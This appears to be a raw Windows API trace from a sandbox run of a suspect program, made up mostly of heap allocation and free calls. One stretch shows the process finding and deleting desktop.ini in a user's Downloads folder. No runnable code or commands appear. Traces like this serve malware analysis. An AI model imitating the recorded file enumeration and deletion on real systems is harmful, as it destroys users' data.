[0086.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0086.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0086.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0086.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0086.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0086.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0086.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0086.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0086.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0086.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f80 | out: hHeap=0x1780000) returned 1 [0086.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fb0 | out: hHeap=0x1780000) returned 1 [0086.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0086.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0086.366] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0086.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0086.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cc1c8 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0086.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359a68 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0086.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0086.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0086.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0086.369] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0086.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0086.369] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Downloads\\desktop.ini", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Downloads\\desktop.ini", lpFilePart=0x0) returned 0x25 [0086.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0086.369] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Downloads\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\downloads\\desktop.ini")) returned 0x26 [0086.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0086.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0086.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0086.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a500 | out: hHeap=0x1780000) returned 1 [0086.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0086.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0086.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0086.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0086.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0086.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0086.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0086.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0086.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0086.369] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Downloads\\desktop.ini", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44137e3b, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="desktop.ini", cAlternateFileName="")) returned 0x41ac540 [0086.369] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Downloads\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\downloads\\desktop.ini")) returned 1 [0086.370] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44137e3b, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0086.371] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0086.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0086.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0086.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0086.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0086.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369d18 | out: hHeap=0x1780000) returned 1 [0086.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0086.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0086.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0086.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0086.371] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0086.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0086.371] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0086.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0086.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0086.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0086.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9938 | out: hHeap=0x1780000) returned 1 [0086.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0086.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0086.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0086.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0086.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0086.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a8388 | out: hHeap=0x1780000) returned 1 [0086.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0086.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0086.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0086.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0086.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918f8 [0086.372] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0086.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0086.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21c0 [0086.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0086.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0086.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2170 [0086.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0086.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2280 [0086.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9a10 [0086.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0086.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0086.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2220 [0086.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9938 [0086.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0086.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9cc8 [0086.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0086.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0086.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2170 [0086.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0086.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0086.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0086.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0086.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0086.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0086.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0086.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0086.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0086.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e48 [0086.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0086.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0086.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22e0 [0086.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0086.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0086.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22e0 [0086.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0086.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0086.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0086.373] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0086.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0086.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0086.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0086.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0086.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0086.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0086.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0086.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0086.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0086.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0086.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0086.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0086.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0086.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0086.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0086.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0086.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0086.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0086.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0086.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0086.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0086.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0086.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0086.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0086.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0086.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0086.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0086.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0086.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0086.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0086.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0086.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0086.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2190 [0086.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0086.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0086.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0086.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0086.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0086.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0086.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0086.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0086.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0086.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0086.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0086.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0086.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e18 [0086.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0086.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x34) returned 0x41ac440 [0086.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0086.375] 